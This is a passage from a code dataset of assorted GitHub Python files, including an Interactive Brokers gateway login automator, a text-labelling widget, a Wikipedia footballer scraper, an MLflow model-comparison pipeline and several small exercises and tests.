same_log10_order_of_magnitude(rng, delta=0.045):\n \"\"\"\n Return true if range is approximately in same order of magnitude\n\n For example these sequences are in the same order of magnitude:\n\n - [log(1), log(8)] # [1, 10)\n - [log(35), log(80)] # [10 100)\n - [log(232), log(730)] # [100, 1000)\n\n Parameters\n ----------\n rng : array-like\n Range of values in log base 10. Must be size 2 and\n ``rng[0] <= rng[1]``.\n delta : float\n Fuzz factor for approximation. Since the ``rng`` is in\n log form, this factor is additional.\n \"\"\"\n rng_adjusted = np.array(rng) + [-delta, +delta]\n return np.diff(rng_adjusted.astype(int))[0] == 0\n\n\ndef identity(*args):\n \"\"\"\n Return whatever is passed in\n \"\"\"\n return args if len(args) > 1 else args[0]\n","repo_name":"AathmanT/flask-website","sub_path":"data/venv/Lib/site-packages/mizani/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"23211577600","text":"import subprocess, fcntl, os\nfrom time import sleep\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom time import time\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom src.logger import logger\nfrom src.utils.config_loader import creds_conf\n\nfrom src.utils.mfa_sms_receiver import MFASMSReceiver\n\nLOGIN_SUCCEEDS_PHRASE = \"Client login succeeds\"\nGATEWAY_RUNNING_PHRASE = \"Open https://localhost:5000 to login\"\nGATEWAY_RUN_PATH = \"bin/run.sh\"\nGATEWAY_CONF_ATH = \"root/conf.yaml\"\nGATEWAY_WORKDIR_PATH = \"external_bin/clientportal.beta.gw\"\nTIMEOUT_SECONDS = 10\n\n\ndef launch_ib_gateway_and_auth():\n _open_gateway_process()\n _automate_auth()\n\n\ndef relaunch():\n _kill_gateway_process()\n\n launch_ib_gateway_and_auth()\n\n\ndef _kill_gateway_process():\n kill_cmd = \"kill -9 $(netstat -ltnp 2>/dev/null | grep 0.0.0.0:5000 | awk '{print $7}' | cut -d \\\"/\\\" -f 1)\"\n\n proc = subprocess.run(kill_cmd, stdout=subprocess.PIPE)\n\n logger.info(f\"Run command output: {proc.stdout.readline()}\")\n\n\ndef 
_open_gateway_process():\n p = subprocess.Popen([GATEWAY_RUN_PATH, GATEWAY_CONF_ATH], cwd=GATEWAY_WORKDIR_PATH,\n stdout=subprocess.PIPE)\n\n # Reading stdout without blocking (https://stackoverflow.com/a/8980466/10249811)\n fcntl.fcntl(p.stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)\n\n # Read stdout until gateway launch finish or timeout reached\n start = time()\n time_elapsed_sec = 0\n\n aggregated_output = b\"\"\n while GATEWAY_RUNNING_PHRASE not in str(aggregated_output) and time_elapsed_sec <= TIMEOUT_SECONDS:\n current_output = p.stdout.read()\n if current_output is not None:\n aggregated_output += current_output\n sleep(1)\n time_elapsed_sec = start - time()\n\n if GATEWAY_RUNNING_PHRASE not in str(aggregated_output):\n raise SystemError(f\"IB gateway failed to launch, output: {aggregated_output}\")\n\n return True\n\n\ndef _automate_auth():\n user_name, password, is_live = creds_conf[\"ib_user_name\"], creds_conf[\"ib_password\"], creds_conf[\n \"is_live_account\"]\n\n sms_receiver = MFASMSReceiver(60)\n if is_live:\n sms_receiver.start_listening_for_auth_code()\n\n driver = webdriver.PhantomJS(service_args=['--ignore-ssl-errors=true'],\n service_log_path=\"/tmp/phantom_logs.log\")\n driver.get(\"https://localhost:5000\")\n\n un_box = driver.find_element_by_id(\"user_name\")\n pw_box = driver.find_element_by_id(\"password\")\n submit_btn = driver.find_element_by_id(\"submitForm\")\n\n un_box.send_keys(user_name)\n pw_box.send_keys(password)\n submit_btn.click()\n\n if is_live:\n # IB uses MFA only for live accounts\n SECURITY_CODE_BOX_ID = \"chlginput\"\n try:\n WebDriverWait(driver, 5).until(\n EC.presence_of_element_located((By.ID, SECURITY_CODE_BOX_ID)))\n except TimeoutException:\n logger.error(\"IB auth failed: MFA security code element wasn't present\")\n driver.quit()\n raise\n\n auth_code = sms_receiver.auth_code\n if auth_code is not None:\n sec_code_box = driver.find_element_by_id(SECURITY_CODE_BOX_ID)\n sec_code_box.send_keys(auth_code)\n\n submit_btn = driver.find_element_by_id(\"submitForm\")\n submit_btn.click()\n else:\n raise SystemError(\"IB auth code for MFA was not received\")\n\n try:\n WebDriverWait(driver, 10).until(\n EC.text_to_be_present_in_element((By.CSS_SELECTOR, \"pre\"), LOGIN_SUCCEEDS_PHRASE))\n except TimeoutException:\n logger.error(f\"Login to IB failed, success page loading timed out, page source: {driver.page_source}\")\n raise\n finally:\n driver.quit()\n\n return True\n\n\nif __name__ == \"__main__\":\n launch_ib_gateway_and_auth()\n","repo_name":"matanbakshi/ib-portfolio-manager","sub_path":"src/utils/ib_gateway_launcher.py","file_name":"ib_gateway_launcher.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"31438611733","text":"import ipywidgets as widgets\nfrom IPython.display import display\nfrom ipywidgets import Button, HBox, VBox\nimport pandas as pd\nimport numpy as np\n\n\n__all__ = ['LabelMyTextWidget']\n\nclass LabelMyTextWidget:\n \"\"\" \n Widget to quickly label a dataframe containing a column with text data and a column with target labels.\n \n \"\"\"\n def __init__(self, df_source, content_column, class_list, class_id, output_column, unclassified_value=-1, randomize=False):\n \"\"\"\n Create a LabelMyTextWidget object.\n \n :param df_source: The pandas dataframe containing the data column and the label column (to fill by the widget)\n :param content_column: The name of the column containing the text data to label\n :param 
class_list: List of the label type names (ex: Positive, Negative, Neutral)\n :param class_id: The id of each label type\n :param output_column: Name of the column to complete with labels\n :param unclassified_value: Value of the unclassified rows for the output_column\n :param randomize: If true, the labeling order will be random. If False, it will follow the index numbers\n\n \n :Example:\n >>> df['text'] = 'example of text content to label'\n >>> df['label'] = -1\n >>> LabelMyText(df, 'text', ['positive', 'negative'], [1, 0], 'label', unclassified_value=-1)\n \"\"\"\n \n self.df_source = df_source\n self.content_column = content_column\n self.output_column = output_column\n self.unclassified_value = unclassified_value\n self.randomize = randomize\n \n \n self.items = [ButtonLabeling(class_id = class_id[i],description=l) for i, l in enumerate(class_list)]\n self.items.append(ButtonLabeling(class_id = unclassified_value, description='Skip', button_style='warning'))\n\n for button in self.items:\n button.on_click(self.on_button_clicked_t)\n\n\n\n self.out = widgets.Output(layout={'border': '1px solid black'})\n self.out.append_stderr('Text is coming here')\n\n button_box = HBox([widgets.Label(value=\"Label\"), *self.items])\n\n self.box = VBox([button_box, self.out]) \n \n self.df_explore = self.df_source[self.df_source[output_column] == unclassified_value].index\n self.cursor = 0\n \n if randomize:\n self.df_explore = np.random.permutation(self.df_explore)\n \n self.out.clear_output(wait=True)\n \n \n def display(self):\n \"\"\"\n Display the widget\n \"\"\"\n display(self.box)\n self.display_next_row()\n \n def on_button_clicked_t(self, b):\n #print(f\"TEST Button clicked: {b.description}, {b.class_id}\")\n if (self.cursor) <= len(self.df_explore) and len(self.df_explore) > 0: \n self.df_source.loc[self.df_explore[self.cursor - 1], self.output_column] = b.class_id\n self.display_next_row()\n \n def display_next_row(self):\n #pdb.set_trace()\n if (self.cursor) >= len(self.df_explore): \n with self.out:\n self.out.clear_output()\n print('Finished: All rows have been processed')\n return\n \n next_text = str(self.df_source[self.content_column].loc[self.df_explore[self.cursor]])\n with self.out:\n print(f'Row index: {self.df_explore[self.cursor]} | Number of rows processed : {self.cursor} \\n')\n print(f'{next_text}')\n \n \n self.cursor += 1\n self.out.clear_output(wait=True)\n \n \n \n \n\nclass ButtonLabeling(Button):\n def __init__(self, class_id, *args, **kwargs):\n self.class_id = class_id\n super().__init__(*args, **kwargs)\n ","repo_name":"tchambon/LabelMyTextWidget","sub_path":"LabelMyTextWidget/LabelMyTextWidget.py","file_name":"LabelMyTextWidget.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"32"} +{"seq_id":"22738204937","text":"from pyspark.sql import SparkSession\n\nspark = SparkSession \\\n .builder \\\n .appName(\"Python Spark SQL Hive integration for clean data\") \\\n .enableHiveSupport() \\\n .getOrCreate()\n\ndatabase = 'service_system_db'\ntable = 'exit_jour'\nlimit = ' limit 10'\nsql = \"select * from {database}.{table} where n_ex_date < \\\n 20180631 and n_ex_date >20180601 {limit}\".format(database=database, table=table, limit=limit)\n\n\nprint(sql)\ndf = 
spark.sql(sql).rdd.collect()\n\n\nspark.stop()\n\n","repo_name":"fountain111/gs_spark","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32596627224","text":"from __future__ import annotations\n\nfrom collections.abc import Callable\nimport webbrowser\n\nfrom prettyqt import core, webenginecore, widgets\nfrom prettyqt.qt import QtWebEngineWidgets\nfrom prettyqt.utils import datatypes\n\n\n# os.environ[\"QTWEBENGINE_CHROMIUM_FLAGS\"] = \"--enable-logging --log-level=3\"\n\n\nclass WebEngineView(widgets.WidgetMixin, QtWebEngineWidgets.QWebEngineView):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setPage(webenginecore.WebEnginePage(self))\n\n def set_url(self, url: datatypes.UrlType | datatypes.PathType):\n \"\"\"Set the url of the WebEngineView.\n\n Clears the view and loads the URL.\n\n Args:\n url: URL to set\n \"\"\"\n url = datatypes.to_url(url)\n self.setUrl(url)\n\n def get_url(self) -> core.Url:\n return core.Url(self.url())\n\n def load_url(self, url: datatypes.UrlType | datatypes.PathType):\n \"\"\"Load the URL.\n\n Loads the specified url and displays it.\n\n Note: The view remains the same until enough data has arrived\n to display the new URL.\n\n Args:\n url: URL to load\n \"\"\"\n url = datatypes.to_url(url)\n self.load(url)\n\n def set_zoom(self, zoom: float):\n \"\"\"Set the zoom factor for the view.\n\n Valid values are within the range from 0.25 to 5.0. The default factor is 1.0.\n\n Args:\n zoom: Zoom factor\n \"\"\"\n self.setZoomFactor(zoom)\n\n def find_text(\n self,\n string: str,\n backward: bool = False,\n case_sensitive: bool = False,\n callback: Callable[[bool], None] | None = None,\n ):\n \"\"\"Find text in the current page.\n\n Finds the specified string, subString, in the page, using the given options.\n The findTextFinished() signal is emitted when a string search is completed.\n\n To clear the search highlight, just pass an empty string.\n\n The resultCallback must take a boolean parameter.\n It will be called with a value of true if the subString was found;\n otherwise the callback value will be false.\n\n Warning: It is guaranteed that the callback is always called,\n but it might be done during page destruction. 
When WebEnginePage is deleted,\n the callback is triggered with an invalid value and it is not safe to use\n the corresponding QWebEnginePage or QWebEngineView instance inside it.\n\n Args:\n string: string to search for\n backward: search backwards\n case_sensitive: case-sensitive search\n callback: result callback\n \"\"\"\n if callback is None:\n\n def do_nothing(x):\n pass\n\n callback = do_nothing\n flag = webenginecore.WebEnginePage.FindFlag(0)\n if case_sensitive:\n flag |= webenginecore.WebEnginePage.FindFlag.FindCaseSensitively\n if backward:\n flag |= webenginecore.WebEnginePage.FindFlag.FindBackward\n self.findText(string, flag, callback)\n\n def get_settings(self) -> webenginecore.WebEngineSettings:\n settings = self.settings()\n return webenginecore.WebEngineSettings(settings)\n\n def set_setting(\n self,\n setting_name: webenginecore.webenginesettings.WebAttributeStr,\n value: bool,\n ):\n self.get_settings()[setting_name] = value\n\n def get_setting(\n self, setting_name: webenginecore.webenginesettings.WebAttributeStr\n ) -> bool:\n return self.get_settings()[setting_name]\n\n @classmethod\n def register_as_browser(cls, tabwidget: widgets.TabWidget):\n class BuiltInBrowser(webbrowser.BaseBrowser):\n def open(self, url: str, new: int = 0, autoraise: bool = True):\n # logger.info(f\"opening {url} with builtin browser..\")\n webview = cls()\n webview.load_url(url)\n if new == 1:\n webview.show()\n else:\n tabwidget.add_tab(webview, url, show=autoraise)\n\n webbrowser.register(\"BuiltInBrowser\", BuiltInBrowser)\n\n def last_context_menu_request(\n self,\n ) -> webenginecore.WebEngineContextMenuRequest | None:\n req = self.lastContextMenuRequest()\n return webenginecore.WebEngineContextMenuRequest(req) if req else None\n\n\nif __name__ == \"__main__\":\n import pathlib\n\n from prettyqt import widgets\n\n app = widgets.app()\n widget = WebEngineView()\n\n import markdown\n\n path = pathlib.Path(\"E:\\\\dev\\\\prettyqt\\\\docs\\\\index.md\")\n\n extensions = [\n \"pymdownx.arithmatex\",\n \"pymdownx.betterem\",\n \"pymdownx.caret\",\n \"pymdownx.critic\",\n \"pymdownx.details\",\n \"pymdownx.emoji\",\n \"pymdownx.inlinehilite\",\n \"pymdownx.magiclink\",\n \"pymdownx.mark\",\n \"pymdownx.smartsymbols\",\n \"pymdownx.superfences\",\n \"pymdownx.tasklist\",\n \"pymdownx.tabbed\",\n \"pymdownx.tilde\",\n ]\n\n html = markdown.markdown(path.read_text(), extensions=extensions)\n widget.setHtml(html)\n page = widget.page()\n path = pathlib.Path(\n \"E:\\\\dev\\\\prettyqt\\\\site\\\\assets\\\\stylesheets\\\\main.26e3688c.min.css\"\n )\n page.insert_stylesheet(\"main.26e3688c.min\", path)\n widget.show()\n app.exec()\n","repo_name":"phil65/PrettyQt","sub_path":"prettyqt/webenginewidgets/webengineview.py","file_name":"webengineview.py","file_ext":"py","file_size_in_byte":5337,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"21349026886","text":"import numpy as np\nimport sys\nnp.set_printoptions(threshold=sys.maxsize)\nimport random\nitem = np.zeros((50,), dtype=int)\nallTransaction = []\nminSupport = 60\nminConfident = 40\n\n\nfirst = 800\nn=0\nwhile(n<800):\n numberOfItem = random.randint(2, 5)\n countInTransaction = 0\n transaction = []\n while(countInTransaction < numberOfItem):\n randNum = random.randint(0,100)\n if randNum < 50: transaction.append(0)\n elif randNum >= 50 and randNum < 80: transaction.append(1)\n else: \n transaction.append(random.randint(0,49))\n countInTransaction +=1\n 
allTransaction.append(transaction)\n n+=1\nn=0\nwhile(n<200):\n numberOfItem = random.randint(6, 8)\n countInTransaction = 0\n transaction = []\n while(countInTransaction < numberOfItem):\n transaction.append(random.randint(0,49))\n countInTransaction +=1\n allTransaction.append(transaction)\n n+=1\n\n\n\nprint(allTransaction)\n\n\nn=0\nlistItem=[]\nwhile n<50:\n listItem.append(np.zeros((1000,), dtype=int))\n n+=1\n\n\nn=0\nwhile n<50:\n count=0\n while count= minSupport: listRemoveSecond.append(i)\nprint(listRemoveSecond)\nprint(\"confident 0 => 1 = {}%\".format(float(countListItemTwoTransaction[0])/(item[0])))\nprint(\"confident 1 => 0 = {}%\".format(float(countListItemTwoTransaction[0])/(item[1])))","repo_name":"werterzz/associationRuleTest","sub_path":"item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18832061140","text":"\"\"\"\nKullanıcıdan aldığınız bir sayının mükemmel olup olmadığını bulmaya çalışın.\n\nBir sayının kendi hariç bölenlerinin toplamı kendine eşitse bu sayıya \"mükemmel sayı\" denir. Örnek olarak, 6 mükemmel bir sayıdır. (1 + 2 + 3 = 6)\n\"\"\"\nprint(\"*****************************\\n\"\n \" Mükemmel Sayı\\n\"\n \"*****************************\")\nsayi = int(input(\"Sayı giriniz : \"))\nsayiListesi = range(1,sayi)\ntamBölenler = list()\ntoplam = 0\nfor x in sayiListesi:\n if sayi % x == 0:\n tamBölenler.append(x)\nprint(tamBölenler)\nfor i in tamBölenler:\n toplam += i\nif sayi == toplam :\n print(sayi,\"bir mükemmel sayıdır.\")\nelse :\n print(sayi ,\"bir mükemmel sayı değildir.\\nToplamları : {}\".format(toplam))\n","repo_name":"mebon/PythonDenemeleri","sub_path":"Problemler3/Problem3_1.py","file_name":"Problem3_1.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36923177411","text":"\"\"\"Demostration of __repr__ magic method and appending all instances into an empty list using a python program\"\"\"\n\nclass Item:\n\n # Creating an empty list to store all the 5 instances\n all = [] \n \n # Initializing Class Attribute\n pay_rate = 0.8 # Pay rate after discount\n\n # A constructor for class Item where we have to implement the instance attributes inside the constructor\n def __init__(self, name: str, price: float, quantity = 0):\n \n # Run validations or conditions for the recieved arguments\n assert price >= 0, f\"Price {price} is not greater than zero!\"\n assert quantity >= 0, f\"Quantity {quantity} is not greater than or equal to 0!\"\n \n # Assign to self object the Instance attribute\n self.name = name\n self.price = price\n self.quantity = quantity\n\n # Actions to execute\n Item.all.append(self)\n\n # Creating a magic method repr to represent all the instances in a list named all\n def __repr__(self):\n return f\"Item('{self.name}', {self.price}, {self.quantity})\"\n\n # Creating a method to calculate the total price of an instance item1 or item2\n def calculate_total_price(self):\n return self.price * self.quantity\n \n # Creating another method to apply Discount to the total price of the object\n def apply_discount(self):\n \n # Using self.pay_rate enables us to retrieve the class attribute pay_rate \n self.price = self.price * self.pay_rate\n\n# Creating 5 Instances of class Item \nitem1 = Item(\"Phone\", 100, 5)\nitem2 = Item(\"Laptop\", 1000, 3)\nitem3 = Item(\"Cable\", 10, 5)\nitem4 = Item(\"Mouse\", 50, 5)\nitem5 = 
Item(\"Keyboard\", 75, 5)\n\nprint(Item.all)","repo_name":"Sidkjr/FreeCodeCamp","sub_path":"OOP-With-Py/main3-0.py","file_name":"main3-0.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41935510901","text":"class Solution(object):\n def combinationSum2(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n nums=[]\n equal=[]\n check=[]\n List=[]\n answer=[]\n index=-1\n for i in candidates:\n if i < target:\n nums.append(i)\n elif i == target:\n equal.append([i])\n self.backtracking(nums,check,List,target, answer,index)\n answer.extend(equal)\n for i in range(len(answer)):\n answer[i]=sorted(answer[i])\n \n answer = [list(x) for x in set([tuple(x) for x in answer])]\n\n\n return answer\n \n \n def backtracking(self,nums,check,List,target, answer,index):\n if sum(List) == target:\n temp=List[:]\n answer.append(temp)\n return\n elif sum(List) > target:\n return\n \n \n for i in range(len(nums)):\n if i>index:\n if i not in check:\n index=i\n check.append(i)\n List.append(nums[i])\n self.backtracking(nums,check,List,target, answer,index)\n List.remove(nums[i])\n check.remove(i)\n \ntarget=1\ncandidates=[1,1]\nabc=Solution()\nanswer=abc.combinationSum2(candidates,target)\nprint(answer) ","repo_name":"MinCheng123/Python","sub_path":"leetcode/40. Combination Sum II.py","file_name":"40. Combination Sum II.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30301755863","text":"import argparse\n\ndef new_simulation_argument_parser(p):\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '-g',\n dest = 'codes_gravity',\n type = str,\n default = p.codes_gravity,\n help = \"Gravity code to use [%s]\"%p.codes_gravity,\n )\n parser.add_argument(\n '-a',\n dest = 'timestep_analysis',\n type = float,\n default = p.timestep_analysis.value_in(p.units_time),\n help = \"Analysis timestep [%s] (0: disabled)\"%p.timestep_analysis,\n )\n parser.add_argument(\n '-p',\n dest = 'timestep_plotting',\n type = float,\n default = p.timestep_plotting.value_in(p.units_time),\n help = \"Plotting timestep [%s] (0: disabled)\"%p.timestep_plotting,\n )\n parser.add_argument(\n '-b',\n dest = 'timestep_backup',\n type = float,\n default = p.timestep_backup.value_in(p.units_time),\n help = \"Backup timestep [%s] (0: disabled)\"%p.timestep_backup,\n )\n parser.add_argument(\n '-t',\n dest = 'timestep',\n type = float,\n default = p.timestep.value_in(p.units_time),\n help = \"Integration timestep [%s] (0: auto)\"%p.timestep_backup,\n )\n parser.add_argument(\n '-e',\n dest = 'time_end',\n type = float,\n default = p.time_end.value_in(p.units_time),\n help = \"End time [%s]\"%p.time_end,\n )\n parser.add_argument(\n '-i',\n dest = 'particles_initial_file',\n type = str,\n default = p.particles_initial_file,\n help = \"Use this model [%s]\"%p.particles_initial_file,\n )\n\n args = parser.parse_args()\n\n p.codes_gravity = args.codes_gravity\n p.timestep_analysis = args.timestep_analysis | p.units_time\n p.timestep_plotting = args.timestep_plotting | p.units_time\n p.timestep_backup = args.timestep_backup | p.units_time\n p.timestep = args.timestep | p.units_time\n p.time_end = args.time_end | p.units_time\n p.particles_initial_file = args.particles_initial_file\n\n return 
p\n","repo_name":"rieder/grps","sub_path":"argumentparser.py","file_name":"argumentparser.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37598321588","text":"\"\"\"Runs CD4ML Pipeline Task to compare classifier models\"\"\"\nimport json\nimport logging\nimport os\nimport sys\nimport time\n\nimport requests\nfrom google.cloud import storage\nfrom mlflow import MlflowClient\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nAPI_ENDPOINT = f'http://{os.getenv(\"API_HOST\")}:5000'\nPROJECT_ID = os.getenv(\"PROJECT_ID\")\nBUCKET_NAME = os.getenv(\"BUCKET_NAME\")\n\nLIMIT = 10\nYEAR = 2012\n\n\ndef download_blob_into_memory(blob_name):\n \"\"\"Downloads a blob into memory.\"\"\"\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(BUCKET_NAME)\n\n blob = bucket.blob(blob_name)\n contents = blob.download_as_bytes()\n\n return contents\n\n\ndef perform_task(params, endpoint):\n api_response = requests.post(f\"{API_ENDPOINT}/{endpoint}\", json=params).json()\n task_id = api_response[\"task_id\"]\n queue = api_response[\"queue\"]\n print(f\"task_id: {task_id}\")\n print(f\"queue: {queue}\")\n\n status = \"PENDING\"\n print(\"Processing...\")\n while status == \"PENDING\":\n time.sleep(3)\n response = requests.get(\n f\"{API_ENDPOINT}/task/{task_id}\", params={\"queue\": f\"{queue}\"}\n ).json()\n status = response[\"status\"]\n print(status)\n\n if status != \"SUCCESS\":\n raise Exception(response)\n else:\n print(\"Task complete!\")\n\n return task_id\n\n\ndef run_imagery(queue: str):\n payload = {\n \"queue\": queue,\n \"gender\": \"Women\",\n \"sub_category\": \"Dress\",\n \"start_year\": YEAR,\n \"limit\": LIMIT,\n \"augmentation_config\": {\n \"albumentation\": {\n \"input_image\": {\"width\": 60, \"height\": 80},\n \"cropping\": {\"height\": {\"min\": 10, \"max\": 70}},\n \"resize\": {\"width\": 256, \"height\": 256},\n }\n },\n }\n run_id = perform_task(payload, \"filter\")\n\n return run_id\n\n\ndef run_inference(run_id: str, queue: str):\n perform_task({\"task_id\": run_id, \"queue\": queue}, \"predict\")\n bucket_file = f\"tasks/{run_id}/inferences.json\"\n content = download_blob_into_memory(bucket_file)\n predictions = json.loads(content)\n logger.info(f\"Number of predictions: {len(predictions)}\")\n logger.info(\n f'Prediction output per image: massive_attr-{len(predictions[0][\"massive_attr\"])}, '\n f'categories-{len(predictions[0][\"categories\"])}'\n )\n\n for idx, predict in enumerate(predictions, 1):\n logger.info(\n f'Image number {idx} ----- mlflow_run_id: {predict[\"mlflow_run_id\"]} '\n f'image_id: {predict[\"image_name\"][0].rsplit(\"/\", 1)[1]} '\n f'category_prediction: {predict[\"category_prediction_index\"]}'\n )\n mlflow_run_id = predict[\"mlflow_run_id\"]\n\n client = MlflowClient(tracking_uri=f'http://{os.getenv(\"MLFLOW_HOST\")}:5000')\n history = client.get_metric_history(mlflow_run_id, \"AUC\")\n\n return history[0].value\n\n\nif __name__ == \"__main__\":\n branch_name = sys.argv[1]\n auc_threshold = sys.argv[2]\n logger.info(\"Branch Name: %s\", branch_name)\n logger.info(\"AUC threshold: %s\", auc_threshold)\n\n logger.info(\"Running inference for current model\")\n run_id_prod = run_imagery(queue=\"imagery\")\n auc_prod = run_inference(run_id=run_id_prod, queue=\"inference\")\n\n logger.info(\"Running inference for candidate model\")\n run_id_candidate = run_imagery(queue=f\"imagery-{branch_name}\")\n auc_candidate 
= run_inference(run_id=run_id_prod, queue=f\"inference-{branch_name}\")\n\n logger.info(\"AUC Prod: %s\", auc_prod)\n logger.info(\"AUC Candidate branch %s: %s\", branch_name, auc_candidate)\n logger.info(\"AUC Threshold: %s\", auc_threshold)\n\n if auc_prod < auc_candidate or auc_candidate < auc_threshold:\n logger.info(\"Requisites for new model were not match!\")\n sys.exit(1)\n","repo_name":"krzischp/tcc-mba-ml-in-prod","sub_path":"src/ml_pipeline/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74852146012","text":"import io\nimport warnings\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport logging\nfrom wiki_scraping_helper import *\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\n# saving exceptions to a log file\nlogging.basicConfig(filename='scraping_errors.log', level=logging.INFO, filemode='a')\n\ndef scrape_disambiguation_page(page_url, page_id, links_params):\n \"\"\"scrapes all footballer pages when a disambiguation page is encountered\"\"\"\n try:\n response = requests.get(page_url, params=links_params)\n if response.status_code != 200:\n logging.warning(f\"Failed to fetch {page_url}\")\n return\n data = response.json()\n links = data[\"query\"][\"pages\"][page_id][\"links\"]\n\n footballer_links = [link[\"title\"] for link in links if \"footballer\" in link[\"title\"]]\n return footballer_links\n\n except Exception as e:\n logging.error(f\"Error processing disambiguation {page_url} {e}.\")\n return []\n\ndef scrape_non_disambiguation_page(player_name):\n page_title = player_name.replace(' ', '_')\n player_url = f\"https://en.wikipedia.org/wiki/{page_title}\"\n response = requests.get(player_url)\n\n if response.status_code == 200:\n print(player_name)\n soup = BeautifulSoup(response.content, 'html.parser')\n tables = soup.find_all('table', {'class': 'wikitable'})\n infobox = soup.find('table', {'class': 'infobox vcard'})\n if infobox is None:\n infobox = soup.find('table', {'class': 'infobox biography vcard'})\n\n club_info, intl_info = [], []\n player_info = get_biographics(infobox, player_url)\n\n for tbl in tables:\n df = pd.read_html(io.StringIO(str(tbl)))\n df = pd.DataFrame(df[0])\n \n if 'Club' in df.columns and not club_info:\n club_info = get_club_stats(df)\n \n elif ('Team' in df.columns or 'National team' in df.columns) and not intl_info:\n\n intl_info = get_intl_stats(df)\n return player_name, player_info, club_info, intl_info\n \n else:\n logging.error(f\"Failed to retrieve player page. 
{player_url}.\")\n return player_name, [], [], []\n \ndef scrape_wikipedia_page(player_name):\n \"\"\"gets club career and international career info for a given player\"\"\"\n api_url = f\"https://en.wikipedia.org/w/api.php\"\n params = {\n \"action\": \"query\",\n \"titles\": player_name,\n \"prop\": \"categories\",\n \"format\": \"json\",\n }\n\n response = requests.get(api_url, params=params)\n if response.status_code == 200:\n player_data = []\n data = response.json()\n\n pages = data[\"query\"][\"pages\"]\n page_id, page_info = next(iter(pages.items()))\n footballer_links = [] # to store disambig data\n\n is_disambiguation_page = any(\"disambiguation\" in cat[\"title\"] for cat in page_info.get(\"categories\", []))\n\n if is_disambiguation_page:\n links_params = {\n \"action\": \"query\",\n \"titles\": player_name,\n \"prop\": \"links\",\n \"pllimit\": \"max\",\n \"format\": \"json\",\n }\n\n footballer_links = scrape_disambiguation_page(api_url, page_id, links_params)\n \n page_title = player_name.replace(' ', '_')\n player_url = f\"https://en.wikipedia.org/wiki/{page_title}\"\n\n player_name, player_info, club_info, intl_info = scrape_non_disambiguation_page(player_name)\n player_data.append([player_name, player_info, club_info, intl_info])\n\n if footballer_links:\n for disambig_title in footballer_links:\n player_name, player_info, club_info, intl_info = scrape_non_disambiguation_page(disambig_title)\n player_data.append([player_name, player_info, club_info, intl_info])\n \n return player_data \n else:\n logging.error(f\"Failed to reach Wiki page{player_url}\")\n return [[player_name, [], [], []]]","repo_name":"clintyr/football-shenanigans","sub_path":"wiki_scraping.py","file_name":"wiki_scraping.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17636372457","text":"import numpy as np \nimport cv2\n\ncamera = cv2.VideoCapture(0)\n\nwhile True:\n\tret, frame = camera.read()\n\tkey = cv2.waitKey(1)\n\n\tif key == 27:\n\t\tbreak\n\n\tframe = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\tret, frame = cv2.threshold(frame,127,255,cv2.THRESH_TRUNC)\n\tcv2.imshow('image', frame)\n\ncv2.destroyAllWindows()","repo_name":"DirtyRattt/git_learning","sub_path":"OpenCV_app.py","file_name":"OpenCV_app.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8757564690","text":"import unittest\nimport unishark.suite\n\n\nclass SuiteTestCase(unittest.TestCase):\n def setUp(self):\n super(SuiteTestCase, self).setUp()\n self.loader = unittest.TestLoader()\n self.suite = None\n\n def test_convert_suite(self):\n self.suite = self.loader.loadTestsFromNames(['tests.mock1.test_module1',\n 'tests.mock1.test_module2'])\n tests = unishark.suite.convert(self.suite)\n self.assertEqual(len(tests), 2)\n self.assertEqual(sum([len(t) for t in tests]), 4)\n self.assertEqual(tests.countTestCases(), 10)\n self.suite = self.loader.loadTestsFromNames(['tests.mock1.test_module1.MyTestClass1',\n 'tests.mock1.test_module1.MyTestClass2',\n 'tests.mock1.test_module2.MyTestClass3',\n 'tests.mock1.test_module2.MyTestClass4'])\n tests = unishark.suite.convert(self.suite)\n self.assertEqual(len(tests), 2)\n self.assertEqual(sum([len(t) for t in tests]), 4)\n 